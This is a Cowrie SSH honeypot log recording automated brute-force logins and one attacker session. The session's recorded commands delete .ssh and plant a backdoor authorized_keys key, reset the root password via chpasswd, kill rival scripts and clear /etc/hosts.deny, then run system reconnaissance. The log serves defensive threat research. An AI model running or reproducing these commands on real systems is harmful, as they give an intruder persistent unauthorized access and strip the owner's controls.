{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:00:01.533217Z","src_ip":"212.227.235.229","session":"e320448760ec"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53482,"dst_ip":"1.2.3.4","dst_port":22,"session":"f5a062a46fb4","protocol":"ssh","message":"New connection: 212.227.235.229:53482 (1.2.3.4:22) [session: f5a062a46fb4]","sensor":"my-vps","timestamp":"2025-09-09T02:00:01.552397Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:00:01.553843Z","src_ip":"212.227.235.229","session":"f5a062a46fb4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:00:01.964339Z","src_ip":"212.227.235.229","session":"36b5bb706ce6"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:00:01.969382Z","src_ip":"212.227.235.229","session":"36b5bb706ce6"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:00:01.972187Z","src_ip":"212.227.235.229","session":"36b5bb706ce6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:00:01.973930Z","src_ip":"212.227.235.229","session":"f5a062a46fb4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:00:02.240682Z","src_ip":"212.227.235.229","session":"36b5bb706ce6"}
{"eventid":"cowrie.login.failed","username":"hunter","password":"Password123","message":"login attempt [hunter/Password123] failed","sensor":"my-vps","timestamp":"2025-09-09T02:00:02.794005Z","src_ip":"212.227.235.229","session":"f5a062a46fb4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:00:03.278376Z","src_ip":"212.227.235.229","session":"36b5bb706ce6"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T02:00:03.279814Z","src_ip":"212.227.235.229","session":"36b5bb706ce6"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T02:00:03.533126Z","src_ip":"212.227.235.229","session":"36b5bb706ce6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:00:03.535100Z","src_ip":"212.227.235.229","session":"36b5bb706ce6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42640,"dst_ip":"1.2.3.4","dst_port":22,"session":"0720e2f0ced0","protocol":"ssh","message":"New connection: 212.227.235.229:42640 (1.2.3.4:22) [session: 0720e2f0ced0]","sensor":"my-vps","timestamp":"2025-09-09T02:00:03.765892Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:00:03.778213Z","src_ip":"212.227.235.229","session":"0720e2f0ced0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:00:04.025633Z","src_ip":"212.227.235.229","session":"0720e2f0ced0"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:00:04.030716Z","src_ip":"212.227.235.229","session":"f5a062a46fb4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35331,"dst_ip":"1.2.3.4","dst_port":22,"session":"8a358dd99140","protocol":"ssh","message":"New connection: 212.227.235.229:35331 (1.2.3.4:22) [session: 8a358dd99140]","sensor":"my-vps","timestamp":"2025-09-09T02:00:05.051674Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:00:05.052511Z","src_ip":"212.227.235.229","session":"8a358dd99140"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T02:00:05.055714Z","src_ip":"212.227.235.229","session":"0720e2f0ced0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:00:05.285064Z","src_ip":"212.227.235.229","session":"8a358dd99140"}
{"eventid":"cowrie.login.failed","username":"ftp2","password":"Password","message":"login attempt [ftp2/Password] failed","sensor":"my-vps","timestamp":"2025-09-09T02:00:06.253873Z","src_ip":"212.227.235.229","session":"8a358dd99140"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:00:06.305565Z","src_ip":"212.227.235.229","session":"0720e2f0ced0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42644,"dst_ip":"1.2.3.4","dst_port":22,"session":"7630008eab40","protocol":"ssh","message":"New connection: 212.227.235.229:42644 (1.2.3.4:22) [session: 7630008eab40]","sensor":"my-vps","timestamp":"2025-09-09T02:00:06.559129Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:00:06.564430Z","src_ip":"212.227.235.229","session":"7630008eab40"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:00:07.488717Z","src_ip":"212.227.235.229","session":"8a358dd99140"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:00:12.570111Z","src_ip":"212.227.235.229","session":"7630008eab40"}
{"eventid":"cowrie.session.closed","duration":"6.0","message":"Connection lost after 6.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:00:12.572205Z","src_ip":"212.227.235.229","session":"7630008eab40"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:00:12.642123Z","src_ip":"212.227.235.229","session":"36b5bb706ce6"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep name | wc -l","sensor":"my-vps","timestamp":"2025-09-09T02:00:12.642849Z","src_ip":"212.227.235.229","session":"36b5bb706ce6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","size":2,"shasum":"3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:00:12.890689Z","src_ip":"212.227.235.229","session":"36b5bb706ce6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:00:13.453666Z","src_ip":"212.227.235.229","session":"36b5bb706ce6"}
{"eventid":"cowrie.command.input","input":"echo \"root:KoH8epCWlMwZ\"|chpasswd|bash","message":"CMD: echo \"root:KoH8epCWlMwZ\"|chpasswd|bash","sensor":"my-vps","timestamp":"2025-09-09T02:00:13.454806Z","src_ip":"212.227.235.229","session":"36b5bb706ce6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eaeb1927ad87c306aaa6ab674f6d31b4e2bbcc5b63c8bd4e3f5e6841c04199ba","size":21,"shasum":"eaeb1927ad87c306aaa6ab674f6d31b4e2bbcc5b63c8bd4e3f5e6841c04199ba","duplicate":false,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/eaeb1927ad87c306aaa6ab674f6d31b4e2bbcc5b63c8bd4e3f5e6841c04199ba after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:00:13.711742Z","src_ip":"212.227.235.229","session":"36b5bb706ce6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:00:14.266399Z","src_ip":"212.227.235.229","session":"36b5bb706ce6"}
{"eventid":"cowrie.command.input","input":"rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","message":"CMD: rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","sensor":"my-vps","timestamp":"2025-09-09T02:00:14.267105Z","src_ip":"212.227.235.229","session":"36b5bb706ce6"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","shasum":"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","destfile":"/etc/hosts.deny","message":"Saved redir contents with SHA-256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b to var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","sensor":"my-vps","timestamp":"2025-09-09T02:00:14.530327Z","src_ip":"212.227.235.229","session":"36b5bb706ce6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","size":0,"shasum":"a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:00:14.531235Z","src_ip":"212.227.235.229","session":"36b5bb706ce6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:00:15.130362Z","src_ip":"212.227.235.229","session":"36b5bb706ce6"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","message":"CMD: cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","sensor":"my-vps","timestamp":"2025-09-09T02:00:15.131098Z","src_ip":"212.227.235.229","session":"36b5bb706ce6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","size":35,"shasum":"95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:00:15.388365Z","src_ip":"212.227.235.229","session":"36b5bb706ce6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:00:15.941690Z","src_ip":"212.227.235.229","session":"36b5bb706ce6"}
{"eventid":"cowrie.command.input","input":"free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","message":"CMD: free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","sensor":"my-vps","timestamp":"2025-09-09T02:00:15.942396Z","src_ip":"212.227.235.229","session":"36b5bb706ce6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","size":29,"shasum":"ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:00:16.186382Z","src_ip":"212.227.235.229","session":"36b5bb706ce6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:00:17.172821Z","src_ip":"212.227.235.229","session":"36b5bb706ce6"}
{"eventid":"cowrie.command.input","input":"ls -lh $(which ls)","message":"CMD: ls -lh $(which ls)","sensor":"my-vps","timestamp":"2025-09-09T02:00:17.173849Z","src_ip":"212.227.235.229","session":"36b5bb706ce6"}
{"eventid":"cowrie.command.input","input":"which ls","message":"CMD: which ls","sensor":"my-vps","timestamp":"2025-09-09T02:00:17.174524Z","src_ip":"212.227.235.229","session":"36b5bb706ce6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40182,"dst_ip":"1.2.3.4","dst_port":22,"session":"1dc5f0f31f66","protocol":"ssh","message":"New connection: 212.227.235.229:40182 (1.2.3.4:22) [session: 1dc5f0f31f66]","sensor":"my-vps","timestamp":"2025-09-09T02:00:20.555272Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:00:20.556020Z","src_ip":"212.227.235.229","session":"1dc5f0f31f66"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:00:20.642534Z","src_ip":"212.227.235.229","session":"1dc5f0f31f66"}
{"eventid":"cowrie.login.failed","username":"huser","password":"changeme","message":"login attempt [huser/changeme] failed","sensor":"my-vps","timestamp":"2025-09-09T02:00:21.027464Z","src_ip":"212.227.235.229","session":"1dc5f0f31f66"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:00:22.116530Z","src_ip":"212.227.235.229","session":"1dc5f0f31f66"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:00:26.672089Z","src_ip":"212.227.235.229","session":"09efbfbf3037"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","size":55,"shasum":"a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","duplicate":true,"duration":"11.4","message":"Closing TTY Log: var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0 after 11.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:00:28.537008Z","src_ip":"212.227.235.229","session":"36b5bb706ce6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:00:29.998565Z","src_ip":"212.227.235.229","session":"36b5bb706ce6"}
{"eventid":"cowrie.command.input","input":"w","message":"CMD: w","sensor":"my-vps","timestamp":"2025-09-09T02:00:29.999276Z","src_ip":"212.227.235.229","session":"36b5bb706ce6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","size":197,"shasum":"50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","duplicate":true,"duration":"1.0","message":"Closing TTY Log: var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326 after 1.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:00:30.998464Z","src_ip":"212.227.235.229","session":"36b5bb706ce6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:00:46.988594Z","src_ip":"212.227.235.229","session":"36b5bb706ce6"}
{"eventid":"cowrie.command.input","input":"uname -m","message":"CMD: uname -m","sensor":"my-vps","timestamp":"2025-09-09T02:00:46.989349Z","src_ip":"212.227.235.229","session":"36b5bb706ce6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","size":7,"shasum":"ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:00:47.238205Z","src_ip":"212.227.235.229","session":"36b5bb706ce6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:00:47.552680Z","src_ip":"212.227.235.229","session":"36b5bb706ce6"}
{"eventid":"cowrie.command.input","input":"top","message":"CMD: top","sensor":"my-vps","timestamp":"2025-09-09T02:00:47.553387Z","src_ip":"212.227.235.229","session":"36b5bb706ce6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","size":44,"shasum":"28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:00:47.807662Z","src_ip":"212.227.235.229","session":"36b5bb706ce6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:00:49.068586Z","src_ip":"212.227.235.229","session":"36b5bb706ce6"}
{"eventid":"cowrie.command.input","input":"uname","message":"CMD: uname","sensor":"my-vps","timestamp":"2025-09-09T02:00:49.069324Z","src_ip":"212.227.235.229","session":"36b5bb706ce6"}
